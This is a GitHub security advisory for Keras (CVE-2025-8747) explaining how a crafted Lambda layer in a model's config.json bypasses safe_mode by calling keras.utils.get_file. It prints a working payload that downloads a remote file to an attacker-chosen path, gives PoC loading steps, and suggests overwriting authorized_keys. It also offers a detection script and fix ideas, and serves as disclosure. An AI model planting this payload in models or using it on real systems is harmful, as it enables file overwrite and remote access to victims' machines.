
Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality

High severity GitHub Reviewed Published Aug 11, 2025 in keras-team/keras • Updated Aug 12, 2025

Package

keras (pip)

Affected versions

>= 3.0.0, < 3.11.0

Patched versions

3.11.0

Description

Summary

It is possible to bypass the mitigation introduced in response to CVE-2025-1550 when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules.

The vulnerability is exploitable in the default configuration and does not depend on user input (it only requires an untrusted model to be loaded).

Impact

Type: Unsafe deserialization
Vector: Client-side (when loading an untrusted model)
Impact: Arbitrary file overwrite; can lead to arbitrary code execution in many cases

Details

Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization, specifically by rejecting any arbitrary embedded Python code, which is marked by the “__lambda__” class name:
https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -

if config["class_name"] == "__lambda__":
    if safe_mode:
        raise ValueError(
            "Requested the deserialization of a `lambda` object. "
            "This carries a potential risk of arbitrary code execution "
            "and thus it is disallowed by default. If you trust the "
            "source of the saved model, you can pass `safe_mode=False` to "
            "the loading function in order to allow `lambda` loading, "
            "or call `keras.config.enable_unsafe_deserialization()`."
        )

A fix, allowing deserialization only of objects from internal Keras modules, was introduced in commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.

package = module.split(".", maxsplit=1)[0]
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:

However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file to download remote files to an attacker-controlled location.
This allows arbitrary file overwrite, which in many cases can also lead to remote code execution. For example, an attacker could download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine.
Since the model does not contain arbitrary Python code, this scenario is not blocked by “safe_mode”. It also bypasses the latest fix, since it uses a function from one of the approved modules (keras).

Example

The following truncated config.json will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local /tmp folder, by passing arbitrary arguments to Keras’ built-in function keras.utils.get_file() -

{
    "class_name": "Lambda",
    "config": {
        "arguments": {
            "origin": "https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js",
            "cache_dir": "/tmp",
            "cache_subdir": "",
            "force_download": true
        },
        "function": {
            "class_name": "function",
            "config": "get_file",
            "module": "keras.utils"
        }
    },
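
When this config is deserialized, the Lambda layer’s function entry resolves to keras.utils.get_file from the allow-listed keras package and the arguments dictionary is forwarded to it. The effect observed in the PoC below is roughly equivalent to the following direct call (a sketch of the end result, not the exact internal call path):

from keras.utils import get_file

# Equivalent of the crafted Lambda config above: fetch the remote file and
# write it to the attacker-chosen location (/tmp/index.js), overwriting any
# existing file because force_download=True.
get_file(
    origin="https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js",
    cache_dir="/tmp",
    cache_subdir="",
    force_download=True,
)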

PoC

  1. Download malicious_model_download.keras to a local directory

  2. Load the model -

from keras.models import load_model
model = load_model("malicious_model_download.keras", safe_mode=True)

  3. Observe that a new file index.js was created in the /tmp directory
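
Until a patched version is in use, one pragmatic mitigation is to statically inspect the model archive before loading it. The sketch below assumes the standard Keras v3 .keras layout (a zip archive containing a top-level config.json) and simply flags any Lambda layer; it is an illustrative check written for this advisory, not an official Keras API.

import json
import zipfile

def find_lambda_layers(path):
    """Return the 'function' entries of any Lambda layers found in a .keras archive."""
    with zipfile.ZipFile(path) as archive:
        config = json.loads(archive.read("config.json"))

    hits = []

    def walk(node):
        # Recursively scan the nested layer config for Lambda entries.
        if isinstance(node, dict):
            if node.get("class_name") == "Lambda":
                hits.append(node.get("config", {}).get("function"))
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config)
    return hits

# A non-empty result warrants manual review before calling load_model().
print(find_lambda_layers("malicious_model_download.keras"))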

Fix suggestions

  1. Add an additional flag block_all_lambda that allows users to completely disallow loading models with a Lambda layer.
  2. Audit the keras, keras_hub, keras_cv, keras_nlp modules and remove/block all “gadget functions” which could be used by malicious ML models.
  3. Add an additional flag lambda_whitelist_functions that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer (a rough sketch of this idea follows below)
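
To make suggestion 3 concrete, the loader could consult a user-supplied allowlist before resolving any function referenced by a Lambda layer. The flag name lambda_whitelist_functions and the helper below are hypothetical, sketched only to illustrate the proposal; they are not part of the Keras API.

# Hypothetical sketch of fix suggestion 3 (names are illustrative, not Keras API).
lambda_whitelist_functions = {"keras.activations.relu", "keras.ops.square"}

def check_lambda_function(module, name, allowlist):
    # Reject any function that the user has not explicitly allow-listed.
    qualified = f"{module}.{name}"
    if qualified not in allowlist:
        raise ValueError(
            f"Function '{qualified}' is not in `lambda_whitelist_functions`; "
            "refusing to deserialize this Lambda layer."
        )

# With the config.json from the example above, the malicious model would be rejected:
# check_lambda_function("keras.utils", "get_file", lambda_whitelist_functions)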

Credit

The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research team.

hertschuh published to keras-team/keras Aug 11, 2025
Published to the GitHub Advisory Database Aug 12, 2025
Reviewed Aug 12, 2025
Last updated Aug 12, 2025

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(0th percentile)

Weaknesses

Deserialization of Untrusted Data

The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid. Learn more on MITRE.

CVE ID

CVE-2025-8747

GHSA ID

GHSA-c9rc-mg46-23w3

Source code

keras-team/keras